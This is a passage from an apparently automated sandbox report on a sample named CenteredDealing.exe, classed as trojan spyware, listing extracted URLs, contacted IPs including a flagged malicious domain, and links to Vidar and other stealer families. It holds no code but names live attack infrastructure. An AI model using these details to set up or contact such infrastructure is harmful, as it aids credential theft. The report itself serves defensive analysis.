                                                                                                                              http://anglebug.com/3623chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://anglebug.com/3625chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://anglebug.com/3624chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.google.com/presentation/Jchrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/5007chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/3862chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000011.00000003.1981566908.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983631875.000064DC00CCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983598019.000064DC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983234616.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1990866210.000064DC00CCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989915090.000064DC00328000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981685293.000064DC00CDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/$uchrome.exe, 00000011.00000003.2009464158.000064DC0157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009569085.000064DC015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009505592.000064DC01590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://anglebug.com/4836chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://issuetracker.google.com/issues/166475273chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://docs.google.com/presentation/:chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/4384chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002487571.000064DC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002633212.000064DC0141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002568886.000064DC01414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/3970chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://apis.google.comchrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chromecache_90.19.dr, chromecache_87.19.drfalse
                                                                                                                                                                		high
                                                                                                                                                                http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://labs.google.com/search?source=ntpchrome.exe, 00000011.00000003.2003480112.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002487571.000064DC0140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003523046.000064DC01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002633212.000064DC0141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2003761661.000064DC0143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002337896.000064DC01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002568886.000064DC01414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://domains.google.com/suggest/flowchromecache_87.19.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000011.00000003.2008607750.00001FFC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1967274392.00001FFC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Wwchrome.exe, 00000011.00000003.2009464158.000064DC0157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009569085.000064DC015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009505592.000064DC01590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://anglebug.com/7604chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/hjchrome.exe, 00000011.00000003.1967680347.00001FFC00684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/7761chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://ogs.google.com/widget/app/so?eom=1chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://anglebug.com/7760chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg6fcjw4.12.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico26pzcb.12.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/5901chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/3965chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/6439chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7406chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/searchchrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://anglebug.com/7161chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://drive-autopush.corp.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.google.com/search?q=$chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://anglebug.com/7162chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/5906chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/2517chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/4937chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://issuetracker.google.com/166809097chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://issuetracker.google.com/200067929chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://lens.google.com/v3/2chrome.exe, 00000011.00000003.2008607750.00001FFC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1967274392.00001FFC00390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://anglebug.com/7847chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/5uchrome.exe, 00000011.00000003.2009464158.000064DC0157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009569085.000064DC015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009505592.000064DC01590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007626147.000064DC01AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://lens.google.com/v3/uploadchrome.exe, 00000011.00000003.1967973449.00001FFC006E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                                              		t.meUnited Kingdom
                                                                                                                                                                                                                              		62041TELEGRAMRUfalse
                                                                                                                                                                                                                              142.250.181.238
                                                                                                                                                                                                                              		plus.l.google.comUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                              		unknownReserved
                                                                                                                                                                                                                              		unknownunknownfalse
                                                                                                                                                                                                                              142.250.185.196
                                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                                              116.203.13.109
                                                                                                                                                                                                                              		h7h7h7.onlineGermany
                                                                                                                                                                                                                              		24940HETZNER-ASDEtrue

                                                                                                                                                                                                                              Private

                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              192.168.2.4
                                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1582918
                                                                                                                                                                                                                              Start date and time:2024-12-31 21:32:09 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 6m 2s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:24
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:CenteredDealing.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal92.troj.spyw.evad.winEXE@47/48@11/7
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 36
                                                                                                                                                                                                                              • Number of non-executed functions: 36
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 2.22.50.131, 192.229.221.95, 142.250.186.99, 142.250.186.142, 74.125.71.84, 142.250.185.238, 172.217.18.14, 142.250.185.131, 142.250.186.106, 142.250.184.234, 142.250.185.74, 172.217.16.202, 142.250.186.138, 172.217.18.106, 142.250.74.202, 142.250.181.234, 172.217.18.10, 216.58.212.170, 142.250.186.170, 172.217.16.138, 142.250.184.202, 216.58.206.42, 216.58.206.74, 142.250.186.42, 52.149.20.212, 13.95.31.18, 184.28.90.27, 4.245.163.56, 4.175.87.197, 13.107.246.45
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: CenteredDealing.exe

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              15:33:00API Interceptor1x Sleep call for process: CenteredDealing.exe modified

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              239.255.255.250https://readermodeext.info/ai-connectGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                https://ocemt-my.sharepoint.com/:o:/g/personal/cgremel_ocemt_edu/El0lVz9DgmtMsBazSuh3bdYBcfj71dOqNLuq6XsKZMLXlA?e=5%3axcx4cZ&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    TieLoader.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324Get hashmaliciousHTMLPhisher, KnowBe4Browse
                                                                                                                                                                                                                                        http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                              http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                  http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                  http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/?setln=pl
                                                                                                                                                                                                                                                  http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.dog/
                                                                                                                                                                                                                                                  LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                  jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                  • t.me/cinoshibot

                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  t.meover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  https://linkenbio.net/59125/247Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99

                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  TELEGRAMRUEtqq32Yuw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  HETZNER-ASDEover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.14.4
                                                                                                                                                                                                                                                  MatAugust.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.14.4
                                                                                                                                                                                                                                                  6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 116.203.14.4
                                                                                                                                                                                                                                                  RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
